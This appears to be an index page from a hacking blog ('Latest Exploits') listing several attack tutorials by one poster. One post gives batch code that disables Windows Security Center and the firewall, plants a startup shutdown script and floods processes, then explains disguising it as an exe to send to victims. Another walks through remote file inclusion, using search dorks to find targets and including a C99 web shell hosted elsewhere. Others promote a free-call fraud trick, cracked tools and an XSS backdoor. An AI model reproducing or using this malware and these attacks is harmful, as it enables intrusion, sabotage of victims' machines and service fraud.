Latest Exploits

Make Free Calls Worldwide

Posted by Sahil™ on , under , | comments (0)



First go to:
INSTALL

After it is fully installed, open friend caller from desktop. Then register.


-


Better to you temp mails like mailinator,eyepaste,yopmail etc ;)

Now go to your email and confirm your account and you will be credited $ 0.10 for free calls. So you can only call for 10 seconds for free but this what I made this tut so you can call free.

Now login.



Then click on phone Icon.



Now open cheat engine. [ Download it from http://u.bb/QK]

Now click on open process.



Then click on window list.



Then select friend caller. And open it.




Now dial number in friend caller. [First test your own number] and click call.



Now it will start ringing:.



Now in cheat engine, enable speed hack. Edit speed to 0.00

If you have any query, comment below.

Create Undetectable Batch File

Posted by Sahil™ on , under | comments (0)



Hello,this is a tutorial showing you how to make a batch file undetectable.
First,if you want to make your way thru the computer and not be seen or something,easiest way is to shutdown all firewalls/security.
To do that you have to type in the following inside Notepad:

Code:
@echo off
net stop “Security Center”
net stop SharedAccess
netsh firewall set opmode mode=disable

hat will stop the Security Center
Shared Access and Firewall.

Save the file as something.bat

But this will probably fail because when the AV detects that it is a batch file it will automatically delete it.
So What to do?

Exe:

Download nBinder Pro:
http://www.midload.com/en/file/29192/nbinder-rar

mirror
http://rapidshare.com/files/109795148/nbinder.rar

pass: linkzshare.net

NBinder pro is a Binder/Converter/Icon Changer

Download,and open.
Click Add..
And add the batch file.
Then you can bind it with self.
By simply clicking Bind.
That will convert the batch to .exe
And then you change the icon.


Com:
Download:
Bat2COM
And convert it.

When it is converted,send it to someone,and when he runs it he will see nothing,but a cmd window open and close.
But what he doesn't see is that his firewall,security has closed.

Now,to make the batch a little more dangerous.


Code:
@echo off
net stop “Security Center”
net stop SharedAccess
netsh firewall set opmode mode=disable
echo shutdown -s >> "%systemdrive%\documents and settings\start menu\programs\startup\virus.bat"
:virus
start cmd.exe
start command.com
start mspaint.exe
goto :virus

So basically shuts down all security.
Makes a new batch file at startup which inside is the command shutdown -s
Then starts cmd.exe command.com and mspaint.exe multiple,multiple times.
Watch the CPU usage go up.

Hack websites using Remote file inlcusion

Posted by Sahil™ on , under | comments (0)



I receive many E-mails on How To Hack websites so,  today I will demonstrate how hackers use remote file inlcusion to deface websites.

Requirements
C99 shell

First of all visit google and type
"index.php?page="

This will show all the pages which have index.php?page=" in their url, RFI vulnerabilities only work on those sites which have index.php?page= in their url.

Now lets say that the website is as follows:

www.targetsite.com/index.php?page=something

so to check the vulnerability we will replace the something to Google or any other site now if Google homepage shows up this means that the website is vulnerable to the attack.The url will look like

 www.targetsite.com/index.php?page=www.google.com


Once we know that the website is vulnerable to the attack we will now include the c99 shell.To do it download the c99 shell and then upload it to a webhosting site such as Ripway.com or 110mb.com


Once the shell is uploaded you will have a unique url for your shell lets say it is

www.webhostingsite.com/c99.txt

Now to execute the shell in order to gain access to the website we will do as follows

http://www.targetsite.com%2Findex.php%3Fpage%3Dwww.webhostingsite.com%2Fc99.txt%3F

Dont forgett the "?" or else it wont be executed.

Remeber this does not work on all websites so the key is to try and try and try and try!

XSS Shell v0.3.9 – Cross Site Scripting Backdoor Tool

Posted by Sahil™ on , under | comments (0)




XSS Shell is a powerful XSS backdoor which allows interactively getting control over a Cross-site Scripting (XSS) vulnerability in a web application. Demonstrates the real power and damage of Cross-site Scripting attacks.

10 Tricks to Xploit SQL Sites

Posted by Sahil™ on , under | comments (0)



Whether it is through manual poking and prodding or the use of securitytools, malicious attackers employ a variety of tricks to break into SQL server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.testing

Earn $45 per month. Guaranteed.

Posted by Sahil™ on , under | comments (0)




EARN $45 PER MONTH. GUARANTEED.                                                            

Get Paid Stuffs For Free Using Black Hat SEO Technique.

Posted by Sahil™ on , under | comments (1)



             I am going to show you how you can download almost anything for FREE. This technique does not include torrents or Lime Wire or anything like that, it includes black hat SEO technique on Google. You may think to yourself there is no way that Google can be hacked but you would be very wrong. There is a way to hack Google and download almost anything.

Earn more than $765 per month!!!

Posted by Sahil™ on , under | comments (0)



 
Earn More Than $765 Per Month                                                                 

My SOLiDumper worth $50 cracked!!!

Posted by Sahil™ on , under | comments (0)





Requirements:
.Net Framework 3.5
DOWNLOAD FROM HERE:
http://www.ziddu.com/download/8760628/MySQLiDumper.rar.html

Screen shots:

Hack Computers using Cain and Abel

Posted by Sahil™ on , under , | comments (0)



 

Cain and Abel (sometimes called simply "Cain") is a Windows password recovery tool. It can recover many kinds of passwords using methods such as network packet sniffing, cracking various password hashes by using methods such as dictionary attacks, brute force and cryptanalysis attacks. Cryptanalysis attacks are done via rainbow tables which can be generated with the winrtgen.exe program provided with Cain and Abel. Cain and Abel is maintained by Massimiliano Montoro.